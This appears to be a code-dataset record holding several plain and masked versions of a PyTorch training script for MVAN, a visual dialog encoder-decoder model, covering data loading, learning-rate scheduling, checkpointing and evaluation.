global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
<|reserved_special_token_0|>
os.environ['CUDA_VISIBLE_DEVICES'] = '0,1'
<|reserved_special_token_0|>
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = torch.device('cuda', self.hparams.gpu_ids[0]
) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')
setproctitle(hparams.dataset_version + '_' + hparams.model_name +
'_' + str(hparams.random_seed[0]))
def _build_dataloader(self):
old_split = 'train' if self.hparams.dataset_version == '0.9' else None
self.train_dataset = VisDialDataset(self.hparams, overfit=self.
hparams.overfit, split='train', old_split=old_split)
collate_fn = None
if 'dan' in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(self.train_dataset, batch_size=
self.hparams.train_batch_size, num_workers=self.hparams.
cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)
print(
"""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
"""
)
def _build_model(self):
print('\t* Building model...')
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print('Encoder: {}'.format(self.hparams.encoder))
print('Decoder: {}'.format(self.hparams.decoder))
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.
hparams.glove_npy))
print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)
)
decoder.word_embed = encoder.word_embed
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
if 'disc' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif 'gen' in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.
train_dataset.vocabulary.PAD_INDEX)
if self.hparams.training_splits == 'trainval':
self.iterations = (len(self.train_dataset) + len(self.
valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset
) // self.hparams.virtual_batch_size
def lr_lambda_fun(current_iteration: int) ->float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0
] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.
lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == 'LambdaLR':
self.optimizer = optim.Adam(self.model.parameters(), lr=self.
hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer,
lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.
hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(self.model, self.
optimizer, self.save_dirpath, hparams=self.hparams)
if self.hparams.load_pthpath == '':
self.start_epoch = 1
else:
self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]
[:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.
hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print('Loaded model from {}'.format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[
'ans_out']
batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
evaluation = Evaluation(self.hparams, model=self.model, split='val')
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0
train_begin = datetime.utcnow()
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
combined_dataloader = itertools.chain(self.train_dataloader)
print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch['img_ids'].shape[0]
if (self.hparams.virtual_batch_size == accumulate_batch or
i == len(self.train_dataset) // self.hparams.
train_batch_size):
self.optimizer.step()
if running_loss > 0.0:
running_loss = (0.95 * running_loss + 0.05 *
batch_loss.item())
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.optimizer
.param_groups[0]['lr']))
tqdm_batch_iterator.set_description(description)
if (global_iteration_step % self.hparams.
tensorboard_step == 0):
description = (
'[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
.format(datetime.utcnow() - train_begin, epoch,
global_iteration_step, running_loss, self.
optimizer.param_groups[0]['lr']))
self._logger.info(description)
self.summary_writer.add_scalar('train/loss',
batch_loss, global_iteration_step)
self.summary_writer.add_scalar('train/lr', self.
optimizer.param_groups[0]['lr'],
global_iteration_step)
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager
.ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
self._logger.info(self.previous_model_path)
if (epoch < self.hparams.num_epochs - 1 and self.hparams.
dataset_version == '0.9'):
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path,
global_iteration_step, self.summary_writer, os.path.join(
self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
epoch))
torch.cuda.empty_cache()
return self.previous_model_path
<|reserved_special_token_1|>
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
import logging
import itertools
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from setproctitle import setproctitle
from bisect import bisect
from datetime import datetime
import numpy as np
from data.dataset import VisDialDataset
from visdial.encoders import Encoder
from visdial.decoders import Decoder
from visdial.model import EncoderDecoderModel
from visdial.utils.checkpointing import CheckpointManager, load_checkpoint
from single_evaluation import Evaluation
class MVAN(object):
def __init__(self, hparams):
self.hparams = hparams
self._logger = logging.getLogger(__name__)
np.random.seed(hparams.random_seed[0])
torch.manual_seed(hparams.random_seed[0])
torch.cuda.manual_seed_all(hparams.random_seed[0])
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
self.device = (
torch.device("cuda", self.hparams.gpu_ids[0])
if self.hparams.gpu_ids[0] >= 0
else torch.device("cpu")
)
setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))
# def _build_data_process(self):
def _build_dataloader(self):
# =============================================================================
# SETUP DATASET, DATALOADER
# =============================================================================
old_split = "train" if self.hparams.dataset_version == "0.9" else None
self.train_dataset = VisDialDataset(
self.hparams,
overfit=self.hparams.overfit,
split="train",
old_split = old_split
)
collate_fn = None
if "dan" in self.hparams.img_feature_type:
collate_fn = self.train_dataset.collate_fn
self.train_dataloader = DataLoader(
self.train_dataset,
batch_size=self.hparams.train_batch_size,
num_workers=self.hparams.cpu_workers,
shuffle=True,
drop_last=True,
collate_fn=collate_fn,
)
print("""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
""")
def _build_model(self):
# =============================================================================
# MODEL : Encoder, Decoder
# =============================================================================
print('\t* Building model...')
# Pass vocabulary to construct Embedding layer.
encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
print("Encoder: {}".format(self.hparams.encoder))
print("Decoder: {}".format(self.hparams.decoder))
# New: Initializing word_embed using GloVe
if self.hparams.glove_npy != '':
encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))
print("Loaded glove vectors from {}".format(self.hparams.glove_npy))
# Share word embedding between encoder and decoder.
decoder.word_embed = encoder.word_embed
# Wrap encoder and decoder in a model.
self.model = EncoderDecoderModel(encoder, decoder)
self.model = self.model.to(self.device)
# Use Multi-GPUs
if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
# =============================================================================
# CRITERION
# =============================================================================
if "disc" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss()
elif "gen" in self.hparams.decoder:
self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)
# Total Iterations -> for learning rate scheduler
if self.hparams.training_splits == "trainval":
self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size
else:
self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size
# =============================================================================
# OPTIMIZER, SCHEDULER
# =============================================================================
def lr_lambda_fun(current_iteration: int) -> float:
"""Returns a learning rate multiplier.
Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
and then gets multiplied by `lr_gamma` every time a milestone is crossed.
"""
current_epoch = float(current_iteration) / self.iterations
if current_epoch <= self.hparams.warmup_epochs:
alpha = current_epoch / float(self.hparams.warmup_epochs)
return self.hparams.warmup_factor * (1.0 - alpha) + alpha
else:
return_val = 1.0
if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones, current_epoch)
return_val = pow(self.hparams.lr_gamma, idx)
elif current_epoch >= self.hparams.lr_milestones2[0]:
idx = bisect(self.hparams.lr_milestones2, current_epoch)
return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)
return return_val
if self.hparams.lr_scheduler == "LambdaLR":
self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)
self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)
else:
raise NotImplementedError
print(
"""
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
)
def _setup_training(self):
if self.hparams.save_dirpath == 'checkpoints/':
self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)
self.summary_writer = SummaryWriter(self.save_dirpath)
self.checkpoint_manager = CheckpointManager(
self.model, self.optimizer, self.save_dirpath, hparams=self.hparams
)
# If loading from checkpoint, adjust start epoch and load parameters.
if self.hparams.load_pthpath == "":
self.start_epoch = 1
else:
# "path/to/checkpoint_xx.pth" -> xx
self.start_epoch = int(self.hparams.load_pthpath.split("_")[-1][:-4])
self.start_epoch += 1
model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)
if isinstance(self.model, nn.DataParallel):
self.model.module.load_state_dict(model_state_dict)
else:
self.model.load_state_dict(model_state_dict)
self.optimizer.load_state_dict(optimizer_state_dict)
self.previous_model_path = self.hparams.load_pthpath
print("Loaded model from {}".format(self.hparams.load_pthpath))
print(
"""
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
)
def _loss_fn(self, epoch, batch, output):
target = (batch["ans_ind"] if "disc" in self.hparams.decoder else batch["ans_out"])
batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))
return batch_loss
def train(self):
self._build_dataloader()
self._build_model()
self._setup_training()
# Evaluation Setup
evaluation = Evaluation(self.hparams, model=self.model, split="val")
# Forever increasing counter to keep track of iterations (for tensorboard log).
global_iteration_step = (self.start_epoch - 1) * self.iterations
running_loss = 0.0 # New
train_begin = datetime.utcnow() # New
print(
"""
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
)
for epoch in range(self.start_epoch, self.hparams.num_epochs):
self.model.train()
# -------------------------------------------------------------------------
# ON EPOCH START (combine dataloaders if training on train + val)
# -------------------------------------------------------------------------
combined_dataloader = itertools.chain(self.train_dataloader)
print(f"\nTraining for epoch {epoch}:", "Total Iter:", self.iterations)
tqdm_batch_iterator = tqdm(combined_dataloader)
accumulate_batch = 0 # taesun New
for i, batch in enumerate(tqdm_batch_iterator):
buffer_batch = batch.copy()
for key in batch:
buffer_batch[key] = buffer_batch[key].to(self.device)
output = self.model(buffer_batch)
batch_loss = self._loss_fn(epoch, batch, output)
batch_loss.backward()
accumulate_batch += batch["img_ids"].shape[0]
if self.hparams.virtual_batch_size == accumulate_batch \
or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch
self.optimizer.step()
# --------------------------------------------------------------------
# Update running loss and decay learning rates
# --------------------------------------------------------------------
if running_loss > 0.0:
running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()
else:
running_loss = batch_loss.item()
self.optimizer.zero_grad()
accumulate_batch = 0
self.scheduler.step(global_iteration_step)
global_iteration_step += 1
# torch.cuda.empty_cache()
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'])
tqdm_batch_iterator.set_description(description)
# tensorboard
if global_iteration_step % self.hparams.tensorboard_step == 0:
description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
datetime.utcnow() - train_begin,
epoch,
global_iteration_step, running_loss,
self.optimizer.param_groups[0]['lr'],
)
self._logger.info(description)
# tensorboard writing scalar
self.summary_writer.add_scalar(
"train/loss", batch_loss, global_iteration_step
)
self.summary_writer.add_scalar(
"train/lr", self.optimizer.param_groups[0]["lr"], global_iteration_step
)
# -------------------------------------------------------------------------
# ON EPOCH END (checkpointing and validation)
# -------------------------------------------------------------------------
self.checkpoint_manager.step(epoch)
self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, "checkpoint_%d.pth" % (epoch))
self._logger.info(self.previous_model_path)
if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':
continue
torch.cuda.empty_cache()
evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,
os.path.join(self.checkpoint_manager.ckpt_dirpath, "ranks_%d_valid.json" % epoch))
torch.cuda.empty_cache()
return self.previous_model_path
|
flexible
|
{
"blob_id": "4d1900c1a0a8d7639e0ec16fb0128fd8efc2e8a1",
"index": 9913,
"step-1": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n <mask token>\n <mask token>\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-2": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-3": "<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = 